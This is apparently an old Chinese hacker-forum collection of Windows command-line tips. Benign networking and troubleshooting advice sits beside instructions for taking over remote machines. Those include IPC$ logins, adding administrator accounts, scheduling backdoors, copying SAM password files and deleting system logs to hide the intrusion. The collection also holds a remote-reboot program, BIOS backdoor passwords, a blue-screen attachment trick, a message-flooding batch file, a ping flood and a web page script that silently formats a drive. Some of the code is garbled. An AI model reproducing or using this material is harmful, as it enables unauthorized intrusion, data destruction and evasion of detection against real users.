1)如何查看本机所开端口:
用netstat -a —n命令查看!再stat下面有一些英文,我来简单说一下这些英文具体都代表什么
LISTEN:侦听来自远方的TCP端口的连接请求
SYN-SENT:再发送连接请求后等待匹配的连接请求
SYN-RECEIVED:再收到和发送一个连接请求后等待对方对连接请求的确认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等待远程TCP连接中断请求,或先前的连接中断请求的确认
FIN-WAIT-2:从远程TCP等待连接中断请求
CLOSE-WAIT:等待从本地用户发来的连接中断请求
CLOSING:等待远程TCP对连接中断的确认
LAST-ACK:等待原来的发向远程TCP的连接中断请求的确认
TIME-WAIT:等待足够的时间以确保远程TCP接收到连接中断请求的确认
CLOSED:没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping -a ip 命令查看!再第一行的pinging后面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也可以得到对方的ip
获得一个网站的ip地址的方法是:ping
www.***.com
比如想知道sohu的ip,就用ping
[url]http://www.sohu.com/[/url]来查看就可以了
顺便说一句:如果返回:Reply from *.*.*.*: TTL expired in transit的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间经过的路由器数目。 2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows中的开始菜单,运行中输入winipcfg,同样可以看到自己的ip
ipconfig命令后面如果加一个参数 /all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令 net helpmsg erorr_code来查看就可以了
比如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 当前登陆使用机器的用户
……
6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有经过的路由器列表!这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:为什么要把路由放在防火墙后面?原因呢,主要有两点:1)保护路由器!因为现在越来越多的***和***已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,所以要放在防火墙里面;2)为路由器减少负担!如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也可以达到同样效果!格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!况且现在也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,如何清除cookie呢?一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Winnt(98为windows)目录(当然了,这些都是默认的目录!如果你安装的时候改名了,就对应的去相应目录)之后找到Temporary Internet Files目录(2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就可以了~,找到这个文件夹后,打开!看到里面有NNNNNNNNNNNN多的文件了么?呵呵,这些是你浏览过的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:阻止所有cookie,呵呵,是不是?
另外一种方法:找到Windows目录下的cookies目录!把里面的txt文件全部删除!,最后应该只剩下一个index.dat文件!之后把这个文件夹设置成只读就可以了~
不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底禁止不禁止就看你自己的了~
8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢?
在DOS上面安装,应该用98启动光盘来引导系统!然后按照下面的方法来做,可以提高安装速度:
g:\>cd windows -------假设G为光驱 windows为98的安装目录!
g:\windows>smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!该文件位于:c:\winnt\system32\config目录中!只要删除这个文件就可以了~
另外,在c:\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!)如果你在登陆肉鸡的时候,copy前面那个目录中的SAM文件,你会发现COPY不下来!呵呵,为什么?因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来获得对方的主机信息的!使用的是UDP和TCP协议!如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:net share c=c:\winnt\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP
从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,net shart查看启动的服务~如果对方开启了Terminal Services服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)
XP的pro和home版的区分:
home edition是无法安装iis的!所以,可以通过iis服务来判断到底是home版或者是pro了~
当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:系统配置实用程序,调用的方法是在:开始--运行中输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!因为很有可能是***!)
除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~
还有利用DEBUG法:
简单介绍两种:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一种方法:copy法:
copy con cmos.com
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个cmos.com程序就可以了~
恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的×××?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包含在2K光盘的\support\tools文件夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?,就可以看到帮助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中可以看到进程的ID号!(不知道有几位朋友用过蓝色火焰?呵呵,用法跟这个一摸一样!还有很多类似的***、后门软件都有类似的功能!这个是windows自带的大***『后门工具』而已!)
这时候,有朋友问了,那再命令行下如何查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,还有一个工具叫tlist 看名字就能看出来是干什么的吧?用法更简单!直接输入tlist就可以得到pid遇队形程序的列表了~
那对方机器如果没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应请求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don`t Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:再cmd下输入netsh,进入到netsh>提示符,再输入:int ip 进入到interface ip> 然后再次输入dump,这时候屏幕上出现当前连接的配置情况了
这里必须介绍一下netsh到底是作什么用的!这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh>提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这样,就可以看到当前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配置:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这样就修改了当前的IP地址,用show address来看看(或者用ipconfig)
3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!例如:再interface ip>状态下输入:dump,会显示一个清单,显示所有本地连接(不管你是否使用~)与netstat -an不完全一样!
这就是netsh的简单介绍和最基础的用法!希望大家能够掌握!还可以输入?来查看帮助!(要在netsh>提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!具体方法如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了)
在此,特别提醒各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都可以登陆的状态)
看我的:net user coldcrysky /time:all --这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~
之后点击保存成批处理文件(后缀为:bat的文件!)!加入到启动组中就可以了~
23)139端口的又一用法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:1)不要利用本帖所提到的方法去搞恶意破坏!2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文件
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
{
文件://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\nhttp://www.xici.net";;
文件://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文件://因为上面的重启不成功,所以需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文件://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文件://判断是NT内核还是9X内核,选择用不同的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器
由于Terminal Service默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文件:内容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
以下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行,方便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ftp 对方网址(IP地址)
上传文件:get 文件在本机完整路径 对方文件存放完整路径
下载文件:put 对方文件完整路径 本机存放文件路径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文件复制到127.0.0.1的C盘下,如果要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令:
主要用于分析目标计算机的基本信息用!具体使用方法请查找相关文件!
G、NBTSTAT命令:
nbtstat -A 对方IP (这个A大写)
『在其中显示前面的英文或数字就是计算机名称!当然,也可以利用PING -A 对方ip的方法来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务!由于对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不知道的还是查阅相关资料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文件属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,知道网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默认为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的相关命令稍微介绍一下!)
我要说的命令就是:开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧?不过为了方便更多的菜鸟能看明白我要说的意思,不用再看其他相关文章,所以我简单说两句:net start是开启服务!那么,如何开启呢?比如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!好像是一句废话
OK,有了这个前提后,下面就继续介绍:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就可以了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~
这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!如果服务名称中不带空格,你可以不用带这个引号!!!这点是我强调的问题!大家一定不要忘记了!『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的!明白原因了吧?』
27)关于双系统的两个问题:
A、如何在双系统(98、2000)中安全删除2K?
先制作一张Windows 98 的启动软盘,再用它启动你的计算机,运行sys命令恢复Windows 98引导记录后,再运行fdisk/mbr恢复主引导记录,完成后进入Windows 98,把winnt 和system volumn information 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。
B、 Windows 98/XP双系统启动菜单修复
1.修复前,在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑,在加载必要的驱动后,出现Windows XP的安装界面。有三个选项:
(1)要现在开始安装Windows XP,请按“Enter”键。
(2)要用“恢复控制台”修复Windows XP安装,按“R”键。
(3)要退出安装程序,不安装Windows XP,按“F3”键;
2. 按“R”键,进入“Microsoft Windows XP (TM) 故障恢复控制台”界面;故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件,然后显示搜寻结果,并询问“要登录到哪个Windows XP安装(要取消,请按Enter)”,选择1. D:\Windows,回车,系统会再询问“管理员密码”,再键入安装Windows XP时设置的管理员密码,回车,出现D:\Windows〉,这时需要输入修复命令Fixboot,后面的参数为启动扇区要写入的磁盘盘符,这里填入C:,回车。修复完成,键入Exit退出。重启后就会看到久违的双重启动菜单了。并且,这样修复后基本不产生垃圾文件。
因为这两个问题是非常非常普遍的,所以我就收集到这里了~
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到更好的防护作用!』
A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!
预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~
B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">
说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……
C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
if (window.top.moveBy){
for (i = 1;i 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
说明:是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行***,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~
D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc=""
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS安装程序,打开附件一项,将WINDOWS SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS VBSCRIPT FILE选项,点击删除!
29)系统自带的系统工具
其实无论大家从什么地方,什么方法找到一些好用的工具,都不如Windows自带的工具用着方便(假设你区的地方正好不能上网,而你又没有准备好这些工具,那怎么办?呵呵,不用着急,用好下面几个Windows自带的小工具,可以使你事半功倍!)
1、msinfo32.exe
位于C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe,显示计算机中的有关系统信息,可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。
2、drwatson.exe --这个工具给我特别的亲密感觉:第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后,我马上试验~果然很有意思!LK007不愧是大哥!现在想起来都佩服不已~~~
位于C: \Windows \drwatson.exe,当某个应用程序在运行过程中出错时,它就会将出错的程序以及出错的内存地址一一记录下来,并保存为Windows的Drwatson子目录下的*.wlg记录文件。
3、sfc.exe
位于C:\Windows\System\sfc.exe,用于自动搜索被改变、删除或损坏了的系统文件。
4、msconfig.exe
位于C:\Windows\System\msconfig.exe,通过修改启动方式以及启动时运行哪些应用程序等系统配置,从而达到快速排除故障的目的。
5、scanreg.exe
位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本),用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件,防止因注册表数据被破坏而导致的系统故障。
6、vcmui.exe
位于C:\Windows\vcmui.exe,在后台自动将被覆盖的驱动程序备份下来,当我们安装的新驱动出错时可用它进行恢复。
7、winrep.exe
位于C:\Windows\winrep.exe,能自动收集有关系统信息并提示用户输入故障所在,帮我们编写一篇完整的“求援”报告,并将其发送给有关技术维护人员,简化“求援”操作。
这七个Windows自带的小程序可以在开始菜单--运行中直接输入文件名(无需输入扩展名)调出该程序!
30)批处理在***中的几则妙用!
A、简化IPC$登陆肉鸡的操作:
用记事本建立一个名字为:ipcruqin.bat的批处理文件,内容如下:
@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已经成功建立连接
之后,大家在CMD下输入:ipcruqin.bat 肉鸡IP 肉鸡的admin帐号/用户的密码。就可以登陆上去了,而不需要那一大长串的命令了!
B、批处理轰炸对方电脑:
打开一记事本,在里面输入如下内容:
@echo 正在轰炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 发送失败
将其保存为bat格式的文件即可,使用方法:*.bat(该批处理文件的名字)+ 空格 + 目标IP + 空格 + 你要对他说得话!
这次先简单介绍这三个!等下次有机会再给大家介绍更多的批处理文件的用途!
31)再说几个非常简单实用的DOS命令(工具):
A、fport.exe --查看那些端口都是那些程序使用的命令。
B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 :23 XX.XX.XX.XX 而你又没有开23端口,那么,呵呵……还用我说么?
C、letmain.exe \\ip -admin -d --列出本机的administrators组的用户名查看是否有异常。
D、pslist.exe --列出进程
E、pskill.exe --杀掉进程,有时候再任务管理器中无法终止程序,那就用这个工具来停止进程。
F、login.exe --列出当前有那些用户登陆再你的机器上。
ping命令详解
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主机,直到你按下Control-C。
此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。
-a Resolve addresses to hostnames.
解析计算机NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 timeping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。
-l size Send buffer size.
定义echo数据包大小。
在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有***性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 timeping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
